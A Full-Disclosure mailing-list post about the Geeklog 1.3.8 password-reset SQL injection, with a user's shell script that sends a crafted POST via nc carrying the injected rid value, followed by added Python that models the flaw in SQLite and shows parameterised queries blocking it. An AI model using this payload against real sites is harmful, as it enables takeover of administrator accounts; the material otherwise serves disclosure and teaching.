On 19.10.2003 at 18:21, Jouko Pynnonen wrote at [EMAIL PROTECTED]:

> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because of an SQL injection problem. In users.php we
> have this kind of code (line about 750):
> ...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh
echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,
Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

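The advisory quoted above says the reset request is checked with an SQL query that has the request id spliced into it, and the script's rid value (URL-decoded: 3' or uid='1) is what turns that check into an always-true condition. The following is an added illustration, not code from this thread or from Geeklog: it models a "forgot password" lookup against an in-memory SQLite database with a constructed schema (table and column names are assumptions, not Geeklog's), and shows the same rid value against a string-built query and against a parameterised one. The parameterised query treats the whole value as one literal token and finds nothing, so the reset is refused.

```python
"""Added example (not part of the original mailing-list thread): a model of a
password-reset lookup, comparing a string-concatenated query with a
parameterised one. Schema, user names and the reset token are constructed
for illustration and are not Geeklog's real tables."""
import sqlite3


def make_db():
    """Build a throwaway database: two users and one pending reset request."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, passwd TEXT)")
    db.execute("CREATE TABLE pwd_requests (uid INTEGER, rid TEXT)")
    # constructed sample data: uid 2 plays the administrator account
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "guest", "x"), (2, "Admin", "secret")])
    # only uid 1 has asked for a reset; its token is 'abc'
    db.execute("INSERT INTO pwd_requests VALUES (1, 'abc')")
    db.commit()
    return db


def lookup_request_vulnerable(db, uid, rid):
    """Untrusted request values pasted straight into the SQL text.
    With rid = "3' or uid='1" the WHERE clause becomes
    (uid = '2' AND rid = '3') OR uid = '1', which matches uid 1's row."""
    sql = f"SELECT uid FROM pwd_requests WHERE uid = '{uid}' AND rid = '{rid}'"
    return db.execute(sql).fetchall()


def lookup_request_safe(db, uid, rid):
    """Same lookup with bound parameters: the quote and OR inside rid are
    just characters of one string literal and never reach the parser."""
    sql = "SELECT uid FROM pwd_requests WHERE uid = ? AND rid = ?"
    return db.execute(sql, (uid, rid)).fetchall()


def reset_password(db, uid, rid, new_pw, lookup):
    """Model of the reset handler: change the password only if `lookup`
    finds a matching reset request. Returns True when the password changed."""
    if not lookup(db, uid, rid):
        return False
    db.execute("UPDATE users SET passwd = ? WHERE uid = ?", (new_pw, uid))
    db.commit()
    return True


def password_of(db, uid):
    return db.execute("SELECT passwd FROM users WHERE uid = ?", (uid,)).fetchone()[0]


if __name__ == "__main__":
    injected_rid = "3' or uid='1"   # the rid value from the thread, URL-decoded
    db = make_db()
    print("vulnerable lookup:", lookup_request_vulnerable(db, "2", injected_rid))
    print("changed Admin password:", reset_password(db, "2", injected_rid, "new", lookup_request_vulnerable))
    db = make_db()
    print("safe lookup:", lookup_request_safe(db, "2", injected_rid))
    print("changed Admin password:", reset_password(db, "2", injected_rid, "new", lookup_request_safe))
```

The point the model makes is that the lookup returns a row for uid 1 while the subsequent UPDATE is keyed on the attacker-supplied uid 2, so the existence check is satisfied by someone else's request. Binding the parameters closes that path; the expiry message Thomas saw is a separate check on the request's age and does not by itself guard the query.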